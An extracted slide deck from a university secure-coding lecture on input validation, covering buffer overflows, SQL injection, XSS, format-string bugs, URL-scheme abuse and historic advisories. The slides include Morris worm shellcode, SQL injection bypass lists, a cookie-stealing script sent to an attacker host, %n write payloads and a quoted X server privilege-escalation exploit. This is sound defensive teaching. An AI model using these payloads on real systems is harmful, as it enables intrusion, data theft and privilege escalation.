P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg titulka
Check your input
PA193 – Secure coding
•Petr Švenda
•Lukáš Němec
•Faculty of Informatics, Masaryk University, Brno, CZ

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Risks of unvalidated input
•Buffer overflow
•Format string vulnerability
•URL commands
•Code insertion / injection
2

url command: http://maps.google.com/maps?f=q&source=s_q&hl=en&q=from+my+home+address+to+%s

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Buffer overflow
•Typical problem of input processing
•Examples shown at last lecture
•One more example of buffer overflow:
–
–Morris worm
3

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•November 2 to November 4, 1988
•Mostly Sun and VAX machines were hit
•Approx. 10% of the 60,000 computers connected to the Internet were affected
•Robert T. Morris was a son of the head of NCSA
•Robert T. Morris currently works at the MIT as tenured proffesor
•
•Source available at: http://www.foo.be/docs-free/morris-worm/worm/
4

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•The Morris worm changed the Internet
•Robert T. Morris was convicted of violating the computer Fraud and Abuse Act (Title 18), and
sentenced to three years of probation, 400 hours of community service and a fine of $10,050.
•Computer Emergency Response
Team (CERT) was formed (at the
Carnegie Mellon University)
morris2004
Robert T. Morris in 2004. Source: http://pdos.csail.mit.edu/~rtm/
5

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•Complex worm
•rsh
•fingerd
•sendmail
•password guessing
•password dictionary
•.rhosts, .forward  files used
–
–Detailed how the worm did it: https://snowplow.org/tom/worm/worm.html
–
6

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•Fingerd vulnerability:
•Finger daemon
•Buffer overflow problem
–remotely available service
–List of logged users
–Information about users
•You specify a username and get info about the user
7

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•Fingerd vulnerability:
•/etc/fingerd expected usernames will be shorter than 512 bytes
char line[512];
line[0] = "\0";
gets(line);
8

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Gets(3)
#include <stdio.h>
char *gets(char *s);
DESCRIPTION
gets()  reads a line from stdin into the buffer pointed to by s until either
a terminating newline or EOF, which it replaces with '\0'.  No check for
buffer overrun is performed.
BUGS
Never use gets().  Because it is impossible to tell without knowing the data
in advance how  many  characters gets() will read, and because gets() will
continue to store characters past the end of the buffer, it is extremely
dangerous to use.  It has been used to break computer security.  Use
fgets() instead.
9

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm
•The worm used the fingerd service and as a username sent 512 noops and 24 characters of shellcode.
•The additional 24 characters end up overwriting the system stack, which controls what functions
are called next. •It opens command interpreter which the worm then uses to pull itself in the
target system.
Source: http://computervirus.uw.hu/ch10lev1sec4.html
10

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Morris worm – the shell code
VAX Opcode        Assembly              Comment
DD8F2F736800      pushl    $68732f       ; '/sh\0'
DD8F2F62696E      pushl    $6e69622f     ; '/bin'
D05E5A            movl     sp, r10       ; save pointer to command
DD00             pushl    $0            ; third parameter
DD00              pushl    $0            ; second parameter
DD5A              pushl    r10           ; push address of '/bin/sh\0'
DD03              pushl    $3            ; number of arguments for chmk
D05E5C            movl     sp, ap        ; Argument Pointer register
                                         ; = stack pointer
BC3B              chmk     $3b           ; change-mode-to-kernel
This code is an execve("/bin/sh", 0, 0) system call to execute a shell.
11

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Fingerd fix
•Fix was easy
fgets(line,sizeof(line),stdin);
gets(line);
fgets() reads in at most one less than size characters from stream  and
stores  them  into  the buffer pointed to by s.  Reading stops after an
EOF or a newline.  If a newline is read, it is stored into the  buffer.
A '\0' is stored after the last character in the buffer.
12

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
SQL injection
•Using unsanitised input to form an SQL query
•Example: Login form
php-login-form
statement = "SELECT * FROM users WHERE name = ' " + username + " ' AND password= ' " + password + "
'; "
username: zriha, password: secret
SQL statement: SELECT * FROM users             WHERE name = 'zriha' AND
password='secret';
username:zriha, password: ' or '1'='1
SQL statement: SELECT * FROM users             WHERE name = 'zriha' AND
            password='' or '1'='1';
13

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
SQL injection – list of common attacks
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
1234' AND 1=0 UNION ALL
SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.
columnfromerror1
HAVING 1=1 --
@@version
select @@version
14

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
SQL injection jokes
Source: http://hackaday.com/2014/04/04/sql-injection-fools-speed-traps-and-clears-your-record/
15
https://hackadaycom.files.wordpress.com/2014/04/18mpenleoksq8jpg.jpg?w=636

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
SQL injection
•Database is typically not read-only
SELECT * FROM users WHERE name = 'zriha' AND
password='x'; DROP ALL TABLES; --’ ;
SELECT * FROM users WHERE name = 'zriha' AND
password='x'; INSERT INTO users values (‘a’,’b’, …) ; --’ ;
16

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
SQL injection jokes
Source: http://xkcd.com/327/
17
Exploits of a Mom

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Possible solutions ?
18

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Possible solutions
•Blacklisting
–List the disallowed cases and ban them
–Filter out or reject input
•Whitelisting
–List the allowed cases
–Filter out other or reject input
•Escaping
–& → &amp < → &lt > → &gt
•Be ready to process everything
–In size, content, encoding, …
19

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Ignore vs. reject
•Be careful: denial-of-service
–When rejecting the input completely
•Ignore bad input, use only good input
–If * is illegal:
•“The ***LAZY*** fox" -> “The LAZY fox“
–Be careful not to use the original input by mistake
–
20

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Blacklisting
•In HTML blacklist < >, particular tags, etc.
•In shells blacklist ` ‘ “ ;
•In SQL blacklist ‘ “
21

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Drawbacks of blacklisting
•Important characters/objects can be forgotten
–E.g. you block <script>, but forget JavaScript elsewhere
•<a href="javascript:alert('Your security is poor')">Foo</a>
–Lowercase/uppercase
•JAVAscRipt:alert('hi')“
–Encoding / charset can change
•Specifications can change
–HTML4 vs. HTML5
–You switch from bash to C-shell
22

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Example of blacklisting
•New tags in HTML5
–New functionality
–Old blacklists will not catch new functionality
–Whitelisting would do a better job here
•
•
<video width="320" height="240" controls="controls" onerror="alert('Test')">
  <source src="movie.mp4" type="video/mp4">
  <source src="movie.ogg" type="video/ogg">
Your browser does not support the video tag.
</video>
<form id="f1" /><button form="f1" formaction="alert(0)">Test</button>
</form>
23

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Whitelisting
•Only alphanumeric characters (username)
–0123456789
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
•Only numbers, spaces, + and ()
–Phone numbers
•Regex for US states
–^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|
HI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|
NV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN| TX|UT|VT|VI|VA|WA|WV|WI|WY)$
•
24

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Escape - Process all input
•Escape problematic input
–Mysql:
•mysql_real_escape_string
•mysql_real_query
–HTML
•“<“ → “&lt;”
•HttpUtility.HtmlEncode in .NET
•
25

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MySQL
•unsigned long mysql_real_escape_string
(MYSQL *mysql, char *to, const char *from, unsigned long length)
$query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'",
mysql_real_escape_string($Username),
mysql_real_escape_string($Password));
mysql_query($query);
This function is used to create a legal SQL string that you can use in an SQL statement. The string
in from is encoded
to an escaped SQL string, taking into account the current character set of the connection. The
result is placed in to and
a terminating null byte is appended. Characters encoded are NUL (ASCII 0), “\n”, “\r”, “\”, “'”,
“"”, and Control-Z.
The string pointed to by from must be length bytes long. You must allocate the to buffer to be at
least length*2+1
bytes long.
26

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MySQL
•int mysql_real_query
(MYSQL *mysql, const char *stmt_str, unsigned long length)
Executes the SQL statement pointed to by stmt_str, which should be a string length bytes long.
mysql_query() cannot be used for statements that contain binary data; you must use
mysql_real_query() instead.
(Binary data may contain the “\0” character, which mysql_query() interprets as the end of the
statement string.)
char query[1000],*end;
end = strmov(query,"INSERT INTO test_table values(");
*end++ = '\'';
end += mysql_real_escape_string(&mysql, end,"What is this",12);
*end++ = '\'';
*end++ = ',';
*end++ = '\'';
end += mysql_real_escape_string(&mysql, end,"binary data: \0\r\n",16);
*end++ = '\'';
*end++ = ')';
if (mysql_real_query(&mysql,query,(unsigned int) (end - query)))
{
   fprintf(stderr, "Failed to insert row, Error: %s\n",
           mysql_error(&mysql));
}
27

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Parameterized/prepared statements
•C# ADO.NET
•
•PHP
•
28
More examples at: http://bobby-tables.com/

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
HTML escaping
•In blogs, guestbooks, etc.
–“Nice website.”
–“Nice website >:)”
–“Nice website <script>document.location="http://server.attacker.com/cookie.cgi?" +
document.cookie</script>”
•Escape input
–Nice website &lt;script&gt;document.location=&quot;http://server.attacker.com/cookie.cgi?&quot; +
document.cookie&lt;/script&gt;
–
29

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
HTML escaping
•You must escape characters:
–& becomes &amp;
–< becomes &lt;
–> becomes &gt;
•In attribute values you must also escape the quote characters:
–" becomes &quot;
–' becomes &#39;
•If your document is ASCII and or another non-Unicode encoding and you're using characters that
aren't supported, you'll need to escape them.
•
•
•
30

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Format string vulnerabilities
•Wide class of functions accepting format string
–printf(“%s”, X);
–resulting string is returned to user (= attacker)
–formatting string can be under attackers control
–variables formatted into string can be controlled
•Resulting vulnerability
–memory content from stack is formatted into string
–possibly any memory if attacker controls buffer pointer
•References
–http://www.team-teso.net/articles/formatstring/
–http://www.eeye.com/eEyeDigitalSecurity/media/ResearchPapers/eeyeMRV-Oct2006.pdf
•
•
•
31

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Format string vulnerability
•printf ( user input );
•A format specification, which consists of optional and required fields, has the following form:
–%[flags] [width] [.precision] [{h | l | I | I32 | I64}]type
•Variable number of arguments
•Taken from the stack
•
•
Source and links:
http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
32

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Source: MSDN
33

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Crashing the program
•printf ("%s%s%s%s%s%s%s%s%s%s%s%s");
–%s will print the string at the pointer
–High chance that pointers will be invalid
–Invalid access to memory
•Program crashes
34

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
View the stack
•printf ("%08x %08x %08x %08x %08x\n");
–Hexadecimal values (8-digit padded)
•Example output
–e32a6ea8 e32a6eb8 00000000 56da6300 56db99e0
35

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Read from memory
•printf(“%s”)
•Prints string at a pointer
–Reads memory at that address
•Address is taken from the parameter
–i.e. taken from the stack
•If format string is also on the stack (e.g. a local variable) you can specify where to read.
36

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Read from memory
•printf(user_input)
•user_input contains "\x10\x01\x48\x08 %x %x %x %x %s"
The key challenge in this attack
is to figure out the distance between
the user input[] and the address
passed to the printf() function. This
distance decides how many %x you
need to insert into the format string,
before giving %s.
37

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Write to memory
•int i;
printf ("12345%n", &i);
•Writes 5 to variable i
•Use similar approach as when reading but replace %s (reading) with %n (writing)
38

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Format string – not only printf
•
/* receiving http packet */
int size = recv(fd, pktBuf, sizeof(pktBuf), 0);
if (size) {
syslog(LOG_INFO, "Received new HTTP request!");
syslog(LOG_INFO, pktBuf);
}
"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n"
39

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Format string vulnerability - prevention
-Wformat
Check calls to printf and scanf, etc., to make sure that the arguments supplied have types
appropriate to the format string specified, and that the conversions specified in the format string
make sense. This includes standard functions, and others specified by format attributes in the
printf, scanf, strftime and strfmon (an X/Open extension, not in the C standard) families (or other
target-specific families). Since -Wformat also checks for null format arguments for several
functions, -Wformat also implies -Wnonnull. -Wformat is included in -Wall.
-Wformat-y2k
If -Wformat is specified, also warn about strftime formats which may yield only a two-digit year.
-Wno-format-extra-args
If -Wformat is specified, do not warn about excess arguments to a printf or scanf format function.
The C standard specifies that such arguments are ignored. Where the unused arguments lie between
used arguments that are specified with `$' operand number specifications, normally warnings are
still given, since the implementation could not know what type to pass to va_arg to skip the unused
arguments. However, in the case of scanf formats, this option will suppress the warning if the
unused arguments are all pointers, since the Single Unix Specification says that such unused
arguments are allowed.
-Wno-format-zero-length
If -Wformat is specified, do not warn about zero-length formats. The C standard specifies that
zero-length formats are allowed.
-Wformat-nonliteral
If -Wformat is specified, also warn if the format string is not a string literal and so cannot be
checked, unless the format function takes its format arguments as a va_list.
-Wformat-security
If -Wformat is specified, also warn about uses of format functions that represent possible security
problems. At present, this warns about calls to printf and scanf functions where the format string
is not a string literal and there are no format arguments, as in printf (foo);. This may be a
security hole if the format string came from untrusted input and contains `%n'. (This is currently
a subset of what -Wformat-nonliteral warns about, but in future warnings may be added to
-Wformat-security that are not included in -Wformat-nonliteral.)
-Wformat=2
Enable -Wformat plus format checks not included in -Wformat. Currently equivalent to `-Wformat
-Wformat-nonliteral -Wformat-security -Wformat-y2k'.
40

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
URL and Files/Emails
•myapp://cmd/run?program=/path/to/program/to/run
•myapp://cmd/set_preference?use_ssl=false
•myapp://cmd/sendfile?to=evil@attacker.com&file=
•      some/data/file
•myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on
•myapp://cmd/login_to?server_to_send_credentials=
•      some.malicious.webserver.com
41

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
URL: File names
myapp://use_template?template=/../../../../../../../../some/other/file
42
•Be aware of files and directory permissions  or access control.

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
What can be input?
•From users (user interface)
•From files
•Over the network
•From other processes (IPC)
•Environment variables
•
43

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
IPC
•Shared memory
•Signals (asynchronous notifications)
–“In 2004, a signal handler race condition was found in open-source code present in many UNIX-based
operating systems. This bug made it possible for a remote attacker to execute arbitrary code or to
stop the FTP daemon from working by causing it to read data from a socket and execute commands
while it was still running as the root user. [CVE-2004-0794]”
Read more at: http://www.frasunek.com/lukemftpd.txt
•RPC (see lecture on integrity of modules)
44

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Environment variables
•Many of them modify loading or execution of a program
–Loading dynamic libraries
–LD_LIBRARY_PATH
–LD_PRELOAD
•Location of files
–Not all of them must be trusted
–PATH
•Does it contain “.”?
45

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Example X server (xkbdir vulnerability)
•Program “X” is X server
•To access the graphical HW it required root access
•To make it usable by normal users it is SUID root
•Anytime you execute it, it runs under root privileges
•Many command line parameters
–One of them is directory where the keyboard map is prepared by running a script
–The script was run as root
–The script could be in any directory including /tmp
•Prepared by the user (attacker)
•As a result the script was run as root…
–The script could do any thing (e.g. create a SUID bash)
46

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
XKEYBOARD SECURITY HOLE
By: Phuzzy L0gik (phuzzy_l0gik@hotmail.com)
==================================================================
SYSTEMS AFFECTED:
=================
X11 Xservers with XKEYBOARD extensions. Just to add to your X-security paranoia, X11R6 based
Xservers with XKEYBOARD
extensions allows local users to execute commands with "extended“ privilages...hehehe >;-) I came
across this about 4 months
ago, but have not seen a writeup on ROOTSHELL yet, so, I thought I'd submit it.
EXPLOIT
=======
$ ex /tmp/xkbcomp
   #!/bin/sh
   .
$ chmod a+x /tmp/xkbcomp
$ XF86_(place your favorite xserver here :p) -xkbdir /tmp
The xserver will now run the /tmp/xkbcomp... wh000t!
 - Phuzzy L0gik (phuzzy_l0gik@hotmail.com)
     -=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
47

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Quick vulnerability check:
$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
Quick fix:
1. as usual chmod u-s,g-s all installed Xserver binaries
2. use xdm or a SAFE and PARANOID wrapper to start Xserver
Details:
In fact, there are (at least) two distict problems in XKB implementation, both related to the use
of -xkbdir option.
1. xkbcomp is invoked using system() or popen() any shell metacharacters included in -xkbdir
argument are interpreted [demonstrated by the "quick vulnerability check"]
2. a user supplied instance of xkbcomp is invoked -xkbdir argument is used to build the path to the
compiler
$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]
48

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Xserver - today
•X server often started using xdm
–Normal users do not run X
–X does not need SUID root privileges
•X server xkbdir parameter
49

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS04-028: JPEG processing
•Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987)
–Impact of Vulnerability: Remote Code Execution
–Maximum Severity Rating: Critical
–Recommendation: Customers should apply the update immediately.
•JPEG Vulnerability - CAN-2004-0200:
–“A buffer overrun vulnerability exists in the processing of JPEG image formats that could allow
remote code execution on an affected system. Any program that processes JPEG images on the affected
systems could be vulnerable to this attack, and any system that uses the affected programs or
components could be vulnerable to this attack. An attacker who successfully exploited this
vulnerability could take complete control of an affected system.”
•Integer underflow
50

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS04-028: Affected components
51

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS04-028: More details
•GDI+ library
–“provides two-dimensional vector graphics, imaging, and typography. GDI+ improves on Windows
Graphics Device Interface (GDI) (the graphics device interface included with earlier versions of
Windows) by adding new features and by optimizing existing features” [MSDN]
•GDI+ Jpeg decoder
–gdiplus.dll
52

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS04-028: More details
•JPEG format contain multiple headers
•Problem is in parsing of comment header
•Each header segment begins with 2-byte ID
•Comment header consist of COM marker (0xFFFE)
•GDI calculates the length of the comment by taking the length of the fields and substrating 2
bytes (for the ID).
53

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS04-028: More details
•If the length of the field is 0 or 1 the calculation is wrong and the result is negative
–1-2 = -1, i.e. 0xFFFFFFFF, i.e. 4Gb -1
•The number is used as 32-bit unsigned integer, i.e. it is interpreted as POSITIVE integer (a big
value – 4 billions).
•As a consequence the copy operation (copying the comment) copies a large block of data.
–That overwrites the Unhandled Exception Filter Pointer
Source: http://www.slideshare.net/ashishmalik10/microsoft-gdi-jpeg-integer-underflow-vulnerability
54

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS12-004: MIDI files
•Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)
•MIDI Remote Code Execution Vulnerability - CVE-2012-0003
–“A remote code execution vulnerability exists in Windows Media Player. An attacker could exploit
this vulnerability by constructing a specially crafted MIDI file that could allow remote code
execution when played using Windows Media Player. An attacker who successfully exploited this
vulnerability could take complete control of an affected system.” [MS]
–Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP)
in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote
attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution
Vulnerability." [CVE]
–
55

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS12-004: More details
•When an application such as Windows Media Player or Internet Explorer parses a MIDI file, a static
heap buffer is allocated (0x400 bytes) but up to 0x440 bytes can be written to.
•
Source:
http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php
56

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS12-004: More details
Before processing the file, Windows Media allocates two buffers in "mseOpen()" in winmm.dll . The
second
buffer is noted as b1. This specific vulnerability lies in the way certain events from the MTrk
chunk are parsed. These events are first read in "smfReadEvents()", defined in quartz.dll
Source:
http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php
57

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS12-004: More details
•An event is identified by its first byte and noted e1 e2 e3, so that ECX = 0x00e3e2e1. Only events
where e1 < 0xF0 are of interest. •Windows Media specifically processes some events, and offset is
then computed according to e1 and e2 to write data to the buffer b1.
•At the end, EAX = ((e1 & 0Fh) * 2^7 + e2) / 2
•
Source:
http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php
58

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
MS12-004: More details
•This is where the data in b1 is going to be altered. For particular values of e1 and e2, it is
possible to get EAX > 400h.
–For example, e1 = 9Fh => 0Fh * 2^7 = 780h.
–Then if e2 > 7Fh, e1 + e2 > 800h which makes EAX >= 400h and the program writes past the bounds of
the allocated buffer.
•Since b1 is 0x400 bytes long, a heap overflow occurs when e1 = 8Fh or 9Fh and when e2 > 7Fh. In
practice, it becomes possible to corrupt the 0x40 bytes following b1, which is enough to achieve
arbitrary code execution.
Source:
http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php
59

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
FreeBSD-SA-13:05.nfsserver
II.  Problem Description
When processing READDIR requests, the NFS server does not check that
it is in fact operating on a directory node.  An attacker can use a
specially modified NFS client to submit a READDIR request on a file,
causing the underlying filesystem to interpret that file as a
directory.
III. Impact
The exact consequences of an attack depend on the amount of input
validation in the underlying filesystem:
 - If the file resides on a UFS filesystem on a little-endian server,
   an attacker can cause random heap corruption with completely
   unpredictable consequences.
 - If the file resides on a ZFS filesystem, an attacker can write
   arbitrary data on the stack.  It is believed, but has not been
   confirmed, that this can be exploited to run arbitrary code in
   kernel context.
Other filesystems may also be vulnerable.
60

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
One last example
•FreeBSD-SA-14:25.setlogin
–Unsanitized buffer, attacker can read kernel memory
–
•
•
•
•
When setlogin(2) is called while setting up a new login session, the login name is copied into an
uninitialized stack buffer, which is then copied into a buffer of the same size in the session
structure. The getlogin(2) system call returns the entire buffer rather than just the portion
occupied by the login name associated with the session.
An unprivileged user can access this memory by calling getlogin(2) and reading beyond the
terminating NUL character of the resulting string. Up to 16 (FreeBSD 8) or 32 (FreeBSD 9 and 10)
bytes of kernel memory may be leaked in this manner for each invocation of setlogin(2). This memory
may contain sensitive information, such as portions of the file cache or terminal buffers, which an
attacker might leverage to obtain elevated privileges.
61

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Input Validation Best Practices:
•
•Apply whitelists (known good values) where possible.
•Canonicalise all inputs. Reduce the data to its simplest form, if the validation functions only
searches for UTF-8 input an attacker could use another encoding method, like UTF-16, to encode the
malicious characters and bypass the validation function.
•Check minimum and maximum lengths and correct syntax of all inputs.
•
https://www.securityninja.co.uk/secure-development/input-validation/
62

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Fuzzing
•technique of randomly or selectively altering otherwise valid data and passing it to a program to
see what happens •scripts or short programs that randomly vary the input passed to a program
•Cannot prove program is ok, but it is a useful help
63

P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.jpg
Reading
•Mandatory reading
–http://www.frasunek.com/lukemftpd.txt
64